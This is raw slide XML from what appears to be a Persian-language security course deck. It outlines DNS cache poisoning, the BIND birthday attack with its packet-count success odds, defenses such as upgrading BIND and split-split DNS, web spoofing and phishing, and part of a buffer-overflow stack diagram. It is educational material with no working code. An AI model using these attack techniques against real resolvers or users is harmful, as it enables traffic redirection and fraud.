          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4981575"/>
            <a:ext cx="7920038" cy="18002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8077200" cy="731838"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DNS cache Poisonning</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411"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fa-IR" sz="2400" smtClean="0"/>
              <a:t>نفوذ گر سعي مي کند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>DNS cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t> را که در طرف کاربر قرار گرفته است آلوده به اطلاعات غلط کند.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>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defRPr/>
            </a:pPr>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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90600" y="0"/>
            <a:ext cx="7696200" cy="1143000"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>BIND Birthday Attack </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27651" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="371475" y="1752600"/>
            <a:ext cx="8391525" cy="3962400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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83</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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143000" y="0"/>
            <a:ext cx="7543800" cy="1143000"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Birthday Attack to BIND</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1524000"/>
            <a:ext cx="8229600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>BIND sends multiple queries for the same domain name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Possible to flood BIND with replies using randomly generated transaction Ids</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you guess correctly, then BIND will accept your reply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>~50% with 300 packets, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>~100% with 700 packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>BIND reused same source UDP port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Made it easy for attacker to “guess” the destination UDP port for the false reply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Newer versions randomize source ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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84</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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14400" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Why DNS Cache Poisoning?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Redirect traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MITM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>man-in-the-middle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ) attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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85</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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143000" y="0"/>
            <a:ext cx="7467600" cy="1143000"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1524000"/>
            <a:ext cx="7924800" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upgrade to BIND 9.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Split-split DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Internal DNS performs recursive queries for users, and cannot be accessed from outside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>External DNS does not do recursive queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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86</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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990600" y="0"/>
            <a:ext cx="7620000" cy="1143000"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30723" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="8043863" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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87</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2158508563"/>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066800" y="0"/>
            <a:ext cx="7620000" cy="1066800"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Web Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4191000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Another name: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker creates misleading context in order to trick the victim. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Online fraud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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88</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="0"/>
            <a:ext cx="8077200" cy="992188"/>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smtClean="0"/>
              <a:t>Web Spoofing Information Flow Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40963" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1828800"/>
            <a:ext cx="7823200" cy="3794125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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89</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>مثال دوم</a:t>
            </a:r>
            <a:endParaRPr smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="1676400"/>
            <a:ext cx="4645824" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نتيجه اجراي اين </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه در پشته به صورت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>زير </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>است:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17413" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="2819400"/>
            <a:ext cx="285750" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17414" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="3124200"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17415" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="3733800"/>
            <a:ext cx="641350" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>*str</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17416" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="2819400"/>
            <a:ext cx="285750" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17417" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="3124200"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17418" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="2819400"/>
            <a:ext cx="285750" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17419" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="3124200"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17420" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="3733800"/>
            <a:ext cx="504825" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17421" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="3733800"/>
            <a:ext cx="557213" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>sfp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17422" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3124200"/>
